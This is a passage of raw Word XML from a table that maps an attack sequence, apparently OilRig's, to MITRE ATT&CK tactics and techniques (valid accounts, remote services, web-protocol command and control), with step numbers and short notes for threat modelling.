                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> has used compromised credentials to access other systems on a victim </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>network.[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC3BB8" w:rsidRPr="00ED5880" w14:paraId="645BAE01" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4911C6B7" w14:textId="575C09A4" w:rsidR="00DC3BB8" w:rsidRPr="00602963" w:rsidRDefault="00D35FFC" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A013D16" w14:textId="4399E5F8" w:rsidR="00DC3BB8" w:rsidRPr="00602963" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0004 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C915055" w14:textId="22444F9F" w:rsidR="00DC3BB8" w:rsidRPr="00602963" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1078</w:t>
            </w:r>
            <w:r w:rsidR="007169FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="007169FB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DC39076" w14:textId="68BF7633" w:rsidR="00DC3BB8" w:rsidRPr="00602963" w:rsidRDefault="00521207" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3289F8ED" w14:textId="77777777" w:rsidR="00DC3BB8" w:rsidRPr="00602963" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="721F71D0" w14:textId="77777777" w:rsidR="00DC3BB8" w:rsidRPr="00602963" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B5E30F9" w14:textId="0416F2EE" w:rsidR="00DC3BB8" w:rsidRPr="00602963" w:rsidRDefault="00D35FFC" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-PES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27899667" w14:textId="59163D79" w:rsidR="00DC3BB8" w:rsidRPr="00602963" w:rsidRDefault="00DC3BB8" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00446654" w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>OilRig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> has used compromised credentials to access other systems on a victim </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>network.[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE0D6D" w:rsidRPr="00ED5880" w14:paraId="636108B4" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F73E609" w14:textId="6A1D177C" w:rsidR="00EE0D6D" w:rsidRPr="00BF260A" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF260A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C4CCCCC" w14:textId="514DE813" w:rsidR="00EE0D6D" w:rsidRPr="00BF260A" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF260A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BF260A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0008 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BF260A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09598CAC" w14:textId="5429BC13" w:rsidR="00EE0D6D" w:rsidRPr="00BF260A" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF260A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BF260A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1021 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BF260A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B765ECD" w14:textId="6F85B1EA" w:rsidR="00EE0D6D" w:rsidRPr="00BF260A" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF260A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="171FC0C8" w14:textId="77777777" w:rsidR="00EE0D6D" w:rsidRPr="00BF260A" w:rsidRDefault="00EE0D6D" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3833781F" w14:textId="77074807" w:rsidR="00EE0D6D" w:rsidRPr="00BF260A" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29941155" w14:textId="447A585A" w:rsidR="00EE0D6D" w:rsidRPr="00BF260A" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-LMV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3069BC14" w14:textId="73CBB1E0" w:rsidR="00EE0D6D" w:rsidRPr="00BF260A" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[7] Based on likely use of exfiltrated passwords above.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF260A" w:rsidRPr="00ED5880" w14:paraId="0DCBC8A0" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78B9E0FC" w14:textId="77777777" w:rsidR="00BF260A" w:rsidRPr="00F808AD" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DF92F24" w14:textId="77777777" w:rsidR="00BF260A" w:rsidRPr="00F808AD" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B923AD7" w14:textId="77777777" w:rsidR="00BF260A" w:rsidRPr="00F808AD" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E81DE1" w14:textId="77777777" w:rsidR="00BF260A" w:rsidRPr="00F808AD" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ACEF710" w14:textId="77777777" w:rsidR="00BF260A" w:rsidRPr="00F808AD" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E8EEBE" w14:textId="77777777" w:rsidR="00BF260A" w:rsidRPr="00F808AD" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="531B9EE7" w14:textId="77777777" w:rsidR="00BF260A" w:rsidRPr="00F808AD" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65ABE061" w14:textId="77777777" w:rsidR="00BF260A" w:rsidRPr="00F808AD" w:rsidRDefault="00BF260A" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817791" w:rsidRPr="00B857D7" w14:paraId="1AF02E48" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F51402E" w14:textId="2941CFE1" w:rsidR="00817791" w:rsidRDefault="00817791" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B17F868" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00B857D7" w:rsidRDefault="00817791" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51A18380" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00B857D7" w:rsidRDefault="00817791" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C3E978C" w14:textId="46047CEC" w:rsidR="00817791" w:rsidRDefault="00817791" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4848ABBA" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00B857D7" w:rsidRDefault="00817791" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F0DE8E" w14:textId="77777777" w:rsidR="00817791" w:rsidRDefault="00817791" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0196BB37" w14:textId="77777777" w:rsidR="00817791" w:rsidRDefault="00817791" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E98E75A" w14:textId="31744CB7" w:rsidR="00817791" w:rsidRDefault="00817791" w:rsidP="00962639">
            <w:r>
              <w:t>Added to tidy Markov transition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817791" w:rsidRPr="00ED5880" w14:paraId="1EB27578" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="228F0869" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00F808AD" w:rsidRDefault="00817791" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644272D1" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00F808AD" w:rsidRDefault="00817791" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="643BB17D" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00F808AD" w:rsidRDefault="00817791" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6114E206" w14:textId="77777777" w:rsidR="00817791" w:rsidRPr="00F808AD" w:rsidRDefault="00817791" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
